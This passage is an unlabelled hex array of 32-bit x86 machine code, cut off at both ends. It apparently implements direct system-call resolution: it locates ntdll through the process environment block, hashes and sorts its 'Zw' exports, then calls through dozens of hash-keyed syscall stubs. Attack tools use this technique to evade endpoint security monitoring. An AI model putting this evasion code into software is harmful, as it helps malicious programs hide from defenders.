x7D,0xE4,0x00,0x75,0x1F,0xC7,0x04,0x24,0x24,0xE8,0x48,0x65,0xE8,0xC3,0xB0,0xFF,0xFF,0xC7,0x04,0x24,0xE3,0xE7,0x48,0x65,0xE8,0xB7,0xB0,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF4,0xC9,0xC3,0x90,0x90,0x90,0xB8,0xAD,0xDE,0xDE,0xC0,0xC3,0x90,0x0F,0x0B,0x55,0x89,0xE5,0x83,0xEC,0x18,0xC7,0x04,0x24,0x0F,0x2A,0x9B,0xCD,0xE8,0xA8,0x05,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xD5,0x0F,0x34,0xC6,0x45,0xD7,0xC3,0x8B,0x45,0x0C,0x83,0xE8,0x02,0x89,0x45,0xE0,0xE8,0xE2,0x05,0x00,0x00,0x85,0xC0,0x74,0x1E,0xC7,0x45,0xDC,0xC0,0x00,0x00,0x00,0x8B,0x45,0xDC,0x64,0x8B,0x00,0x89,0x45,0xD8,0x8B,0x45,0xD8,0x89,0x45,0xE4,0x8B,0x45,0xE4,0xE9,0x00,0x01,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x35,0x8B,0x55,0x08,0x8B,0x45,0xF4,0x01,0xD0,0x89,0x45,0xE4,0xC7,0x44,0x24,0x08,0x03,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x44,0x24,0x04,0x8D,0x45,0xD5,0x89,0x04,0x24,0xE8,0xF2,0x41,0x00,0x00,0x85,0xC0,0x75,0x08,0x8B,0x45,0xE4,0xE9,0xC6,0x00,0x00,0x00,0x83,0x45,0xF4,0x01,0x8B,0x45,0xF4,0x3B,0x45,0xE0,0x72,0xC3,0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0xE9,0x9C,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xEB,0x3B,0x8B,0x55,0x08,0x8B,0x45,0xEC,0x01,0xC2,0x8B,0x45,0xF0,0x0F,0xAF,0x45,0x0C,0x01,0xD0,0x89,0x45,0xE4,0xC7,0x44,0x24,0x08,0x03,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x44,0x24,0x04,0x8D,0x45,0xD5,0x89,0x04,0x24,0xE8,0x97,0x41,0x00,0x00,0x85,0xC0,0x75,0x05,0x8B,0x45,0xE4,0xEB,0x6E,0x83,0x45,0xEC,0x01,0x8B,0x45,0xEC,0x3B,0x45,0xE0,0x72,0xBD,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xEB,0x3B,0x8B,0x55,0x08,0x8B,0x45,0xE8,0x01,0xC2,0x8B,0x45,0xF0,0x0F,0xAF,0x45,0x0C,0x29,0xC2,0x89,0x55,0xE4,0xC7,0x44,0x24,0x08,0x03,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x44,0x24,0x04,0x8D,0x45,0xD5,0x89,0x04,0x24,0xE8,0x4B,0x41,0x00,0x00,0x85,0xC0,0x75,0x05,0x8B,0x45,0xE4,0xEB,0x22,0x83,0x45,0xE8,0x01,0x8B,0x45,0xE8,0x3B,0x45,0xE0,0x72,0xBD,0x83,0x45,0xF0,0x01,0x81,0x7D,0xF0,0x25,0x02,0x00,0x00,0x0F,0x86,0x57,0xFF,0xFF,0xFF,0xB8,0xAC,0x89,0x48,0x65,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0xDE,0xC0,0x37,0x13,0xEB,0x24,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x8B,0x55,0x08,0x01,0xD0,0x0F,0xB7,0x00,0x66,0x89,0x45,0xF6,0x0F,0xB7,0x45,0xF6,0x8B,0x55,0xF8,0xC1,0xCA,0x08,0x01,0xD0,0x31,0x45,0xF8,0x8B,0x55,0x08,0x8B,0x45,0xFC,0x01,0xD0,0x0F,0xB6,0x00,0x84,0xC0,0x75,0xCD,0x8B,0x45,0xF8,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x81,0xEC,0x84,0x00,0x00,0x00,0xA1,0x40,0x30,0x49,0x65,0x85,0xC0,0x74,0x0A,0xB8,0x01,0x00,0x00,0x00,0xE9,0x9C,0x03,0x00,0x00,0xC7,0x45,0xA4,0x30,0x00,0x00,0x00,0x8B,0x45,0xA4,0x64,0x8B,0x00,0x89,0x45,0xA0,0x8B,0x45,0xA0,0x89,0x45,0xDC,0x8B,0x45,0xDC,0x8B,0x40,0x0C,0x89,0x45,0xD8,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xD8,0x8B,0x40,0x0C,0x89,0x45,0xEC,0xE9,0x82,0x00,0x00,0x00,0x8B,0x45,0xEC,0x8B,0x40,0x18,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x89,0xC2,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x83,0xC0,0x78,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x00,0x89,0x45,0xC8,0x83,0x7D,0xC8,0x00,0x74,0x40,0x8B,0x55,0xF0,0x8B,0x45,0xC8,0x01,0xD0,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x8B,0x50,0x0C,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xC4,0x8B,0x45,0xC4,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6E,0x74,0x64,0x6C,0x75,0x19,0x8B,0x45,0xC4,0x83,0xC0,0x04,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6C,0x2E,0x64,0x6C,0x74,0x1E,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xEC,0x8B,0x00,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x85,0x70,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBE,0x02,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x40,0x18,0x89,0x45,0xE8,0x8B,0x45,0xF4,0x8B,0x50,0x1C,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xC0,0x8B,0x45,0xF4,0x8B,0x50,0x20,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xBC,0x8B,0x45,0xF4,0x8B,0x50,0x24,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xB8,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x44,0x30,0x49,0x65,0x8B,0x45,0xE8,0x05,0xFF,0xFF,0xFF,0x3F,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xBC,0x01,0xD0,0x8B,0x10,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xB0,0x8B,0x45,0xB0,0x0F,0xB7,0x00,0x66,0x3D,0x5A,0x77,0x75,0x69,0x8B,0x55,0xE4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x8D,0x1C,0x02,0x8B,0x45,0xB0,0x89,0x04,0x24,0xE8,0x2D,0xFE,0xFF,0xFF,0x89,0x03,0x8B,0x45,0xE8,0x05,0xFF,0xFF,0xFF,0x7F,0x8D,0x14,0x00,0x8B,0x45,0xB8,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xC0,0x8D,0x0C,0x02,0x8B,0x55,0xE4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x01,0x89,0x42,0x04,0x83,0x45,0xE4,0x01,0x81,0x7D,0xE4,0x26,0x02,0x00,0x00,0x74,0x10,0x83,0x6D,0xE8,0x01,0x83,0x7D,0xE8,0x00,0x0F,0x85,0x5F,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x8B,0x45,0xE4,0xA3,0x40,0x30,0x49,0x65,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0x3A,0x01,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xE9,0x16,0x01,0x00,0x00,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x48,0x04,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x40,0x04,0x39,0xC8,0x0F,0x83,0xDB,0x00,0x00,0x00,0xC7,0x45,0x94,0x00,0x00,0x00,0x00,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x00,0x89,0x45,0x94,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x40,0x04,0x89,0x45,0x98,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x8D,0x0C,0x02,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x01,0x89,0x02,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x8D,0x0C,0x02,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x41,0x04,0x89,0x42,0x04,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x45,0x94,0x89,0x02,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x45,0x98,0x89,0x42,0x04,0x83,0x45,0xE0,0x01,0xA1,0x40,0x30,0x49,0x65,0x2B,0x45,0xE4,0x83,0xE8,0x01,0x39,0x45,0xE0,0x0F,0x82,0xD6,0xFE,0xFF,0xFF,0x83,0x45,0xE4,0x01,0xA1,0x40,0x30,0x49,0x65,0x83,0xE8,0x01,0x39,0x45,0xE4,0x0F,0x82,0xB5,0xFE,0xFF,0xFF,0x8B,0x45,0xB4,0x83,0xC0,0x0C,0x8B,0x50,0x04,0x8B,0x45,0xB4,0x8B,0x40,0x04,0x29,0xC2,0x89,0x55,0xAC,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xEB,0x4B,0x8B,0x55,0xE4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x50,0x04,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xA8,0x8B,0x55,0xE4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x8D,0x1C,0x02,0x8B,0x45,0xAC,0x89,0x44,0x24,0x04,0x8B,0x45,0xA8,0x89,0x04,0x24,0xE8,0xC9,0xFA,0xFF,0xFF,0x89,0x43,0x08,0x83,0x45,0xE4,0x01,0xA1,0x40,0x30,0x49,0x65,0x83,0xE8,0x01,0x39,0x45,0xE4,0x72,0xA8,0xB8,0x01,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x18,0xE8,0x37,0xFC,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x39,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x21,0x8B,0x55,0xF4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x05,0x44,0x30,0x49,0x65,0x8B,0x00,0x39,0x45,0x08,0x75,0x05,0x8B,0x45,0xF4,0xEB,0x13,0x83,0x45,0xF4,0x01,0xA1,0x40,0x30,0x49,0x65,0x39,0x45,0xF4,0x72,0xD5,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x18,0xE8,0xE6,0xFB,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x49,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x31,0x8B,0x55,0xF4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x05,0x44,0x30,0x49,0x65,0x8B,0x00,0x39,0x45,0x08,0x75,0x15,0x8B,0x55,0xF4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x05,0x4C,0x30,0x49,0x65,0x8B,0x00,0xEB,0x13,0x83,0x45,0xF4,0x01,0xA1,0x40,0x30,0x49,0x65,0x39,0x45,0xF4,0x72,0xC5,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x64,0xA1,0xC0,0x00,0x00,0x00,0x85,0xC0,0x75,0x06,0xB8,0x00,0x00,0x00,0x00,0xC3,0xB8,0x01,0x00,0x00,0x00,0xC3,0x90,0x0F,0x0B,0x8B,0x04,0x24,0xC3,0x90,0x0F,0x0B,0x68,0x0F,0x2A,0x9B,0xCD,0xE8,0x75,0xFF,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x1C,0xFF,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x2F,0x1A,0xBF,0xFF,0xE8,0x54,0xFF,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xFB,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x67,0x75,0x8B,0x11,0xE8,0x33,0xFF,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xDA,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x3F,0xD3,0x52,0x22,0xE8,0x12,0xFF,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xB9,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xA2,0x15,0xA9,0x8F,0xE8,0xF1,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x98,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x20,0xBC,0xBC,0xBD,0xE8,0xD0,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x77,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x80,0xE9,0x93,0x03,0xE8,0xAF,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x56,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x32,0x1B,0xAB,0x17,0xE8,0x8E,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x35,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x1B,0x03,0x95,0x05,0xE8,0x6D,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x14,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x05,0x2F,0x93,0x01,0xE8,0x4C,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xF3,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xB6,0x8E,0x01,0x96,0xE8,0x2B,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xD2,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x1A,0x2A,0xB2,0x24,0xE8,0x0A,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xB1,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xE3,0xE2,0x98,0x11,0xE8,0xE9,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x90,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x8F,0x2C,0x5B,0x4A,0xE8,0xC8,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x6F,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x13,0xA4,0xBF,0x9C,0xE8,0xA7,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x4E,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x4F,0xF6,0x23,0x0E,0xE8,0x86,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x2D,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xE3,0x76,0x63,0x42,0xE8,0x65,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x0C,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x1A,0x6A,0xB2,0x64,0xE8,0x44,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xEB,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xA0,0x64,0x2E,0x65,0xE8,0x23,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xCA,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x0C,0x32,0x9F,0x1D,0xE8,0x02,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xA9,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x36,0x71,0x91,0x27,0xE8,0xE1,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x88,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x84,0x83,0x9C,0x09,0xE8,0xC0,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x67,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x87,0x5F,0xBE,0x1A,0xE8,0x9F,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x46,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xEA,0x62,0xBD,0xBC,0xE8,0x7E,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x25,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x6D,0xBA,0xD1,0x8A,0xE8,0x5D,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x04,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x0F,0x98,0x97,0x8C,0xE8,0x3C,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xE3,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xA7,0x8C,0x3A,0xA6,0xE8,0x1B,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xC2,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xF9,0x12,0x69,0xF0,0xE8,0xFA,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xA1,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x18,0x39,0xA3,0x73,0xE8,0xD9,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x80,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xFB,0x5E,0xAB,0x7C,0xE8,0xB8,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x5F,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x1E,0x5C,0x98,0x38,0xE8,0x97,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x3E,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x82,0x4D,0xDF,0x84,0xE8,0x76,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x1D,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x0C,0x86,0xB2,0xA1,0xE8,0x55,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xFC,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x80,0x2D,0x1F,0x0A,0xE8,0x34,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xDB,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x13,0x36,0x82,0x14,0xE8,0x13,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xBA,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x8A,0xF2,0x3D,0xE6,0xE8,0xF2,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x99,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x3A,0x3D,0xA8,0x32,0xE8,0xD1,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x78,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x5C,0x59,0xF3,0x6A,0xE8,0xB0,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x57,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x6E,0x23,0x30,0xE8,0xE8,0x8F,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x36,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xE3,0x55,0x3F,0x11,0xE8,0x6E,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x15,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x04,0x0E,0xDA,0x6B,0xE8,0x4D,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xF4,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x10,0xDE,0xB1,0x12,0xE8,0x2C,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xD3,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x20,0x35,0x89,0x10,0xE8,0x0B,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xB2,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xB5,0x3A,0x1B,0x38,0xE8,0xEA,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x91,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x9C,0xD0,0xC6,0x20,0xE8,0xC9,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x70,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x3C,0xF4,0x9E,0xBA,0xE8,0xA8,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x4F,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x44,0x8D,0x66,0xCB,0xE8,0x87,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x2E,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x8F,0x59,0x39,0x13,0xE8,0x66,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x0D,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xBA,0x75,0xEB,0xB6,0xE8,0x45,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xEC,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xEF,0xD9,0xB0,0x1B,0xE8,0x24,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xCB,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0